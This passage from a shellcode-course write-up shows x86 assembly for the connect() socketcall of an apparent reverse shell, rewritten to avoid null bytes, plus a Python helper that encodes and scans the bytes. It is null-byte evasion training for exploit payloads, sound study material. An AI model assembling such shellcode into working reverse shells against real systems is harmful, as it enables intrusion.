We need to get rid of the null-bytes. In assembly, alternative instructions that avoid null-bytes should be used instead. Numerous methods exist, such as XOR’ing a register with itself and moving the zeroed register to the destination where a null is needed, for example for string termination.
To save pages explaining why every modified instruction was modified, I’ve included a comment section for every function which explains the modifications.
Because a lot of code is being reused, only the added part of the function “connect” will be shown.
For the other functions, please see Assignment 1.
Connect socket
Same code as for binding the socket in assignment one; the only difference is calling socketcall function 3 (sys_connect) instead of function 2 (sys_bind).
; Connect socket
; int connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
; connect(sock, (struct sockaddr *) &sockaddr, sizeof(sockaddr));
; BEGIN OLD CODE COMMENTED DUE TO NULL BYTES
; mov eax, 102 ; socketcall
; mov ebx, 3 ; socketcall type 3 (sys_connect)
; push 0 ; IPPROTO_IP 0
; push 1 ; SOCK_STREAM 1
; push 2 ; AF_INET 2
; END OLD CODE COMMENTED DUE TO NULL BYTES
mov al, 102 ; socketcall, moving to lower byte of EAX (only AL is written, the upper bytes keep their previous value)
mov bl, 3 ; socketcall type 3 (sys_connect), moving to lower byte of EBX (only BL is written)
; sys_connect arguments
push 16 ; sockaddr struct, sizeof(struct sockaddr) = 16
push ecx ; Pointer to sockaddr_in
push edx ; FD socket
mov ecx, esp ; Argument array pointer
int 0x80 ; syscall, calling with arguments
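As an added example that is not part of the write-up, the following Python script encodes the handful of instructions shown above the way the assembler would and scans the result for null bytes, so the old and new forms of the connect() setup can be compared byte by byte. The encoder is a constructed helper that only covers these instructions; the remaining instructions (push ecx, push edx, mov ecx, esp, int 0x80) are given as raw bytes.

```python
# Tiny x86-32 encoder for the instructions used in the write-up plus a
# null-byte scanner (constructed helper, not the assignment's own code).
# Encodings follow the Intel SDM: B8+r id, B0+r ib, 6A ib, 68 id, 31 /r.
REG32 = {"eax": 0, "ecx": 1, "edx": 2, "ebx": 3}
REG8 = {"al": 0, "cl": 1, "dl": 2, "bl": 3}

def mov_imm32(reg, imm):
    # mov r32, imm32 -> B8+r followed by a 4-byte little-endian immediate
    return bytes([0xB8 + REG32[reg]]) + imm.to_bytes(4, "little")

def mov_imm8(reg, imm):
    # mov r8, imm8 -> B0+r ib; only the low byte of the register is written
    return bytes([0xB0 + REG8[reg], imm & 0xFF])

def push_imm(imm):
    # push imm: 6A ib when the value fits a sign-extended byte, else 68 id
    if -128 <= imm <= 127:
        return bytes([0x6A, imm & 0xFF])
    return bytes([0x68]) + (imm & 0xFFFFFFFF).to_bytes(4, "little")

def xor_reg_reg(reg):
    # xor r32, r32 -> 31 /r with mod=11, reg=src, rm=dst (same register)
    return bytes([0x31, 0xC0 | (REG32[reg] << 3) | REG32[reg]])

def find_nulls(code):
    # offsets of every 0x00 byte in a machine-code buffer
    return [i for i, b in enumerate(code) if b == 0]

def null_free_mov(reg32, imm):
    # the write-up's substitutions: xor for 0, mov r8 for 1..255 (assumes the
    # upper 24 bits are already clear), plain mov imm32 for anything larger
    if imm == 0:
        return xor_reg_reg(reg32)
    if 0 < imm < 256:
        return mov_imm8(reg32[1] + "l", imm)   # eax -> al, ebx -> bl, ...
    return mov_imm32(reg32, imm)

# Old (commented-out) and new forms of the connect() socketcall setup;
# push ecx / push edx / mov ecx, esp / int 0x80 are given as raw bytes.
OLD = (mov_imm32("eax", 102) + mov_imm32("ebx", 3)
       + push_imm(0) + push_imm(1) + push_imm(2))
NEW = (null_free_mov("eax", 102) + null_free_mov("ebx", 3) + push_imm(16)
       + bytes([0x51, 0x52, 0x89, 0xE1, 0xCD, 0x80]))

if __name__ == "__main__":
    print("old nulls at", find_nulls(OLD), "new nulls at", find_nulls(NEW))
```

Running it lists seven null offsets for the old form and none for the new one, which is the same check objdump -d would let you do by eye on the assembled object.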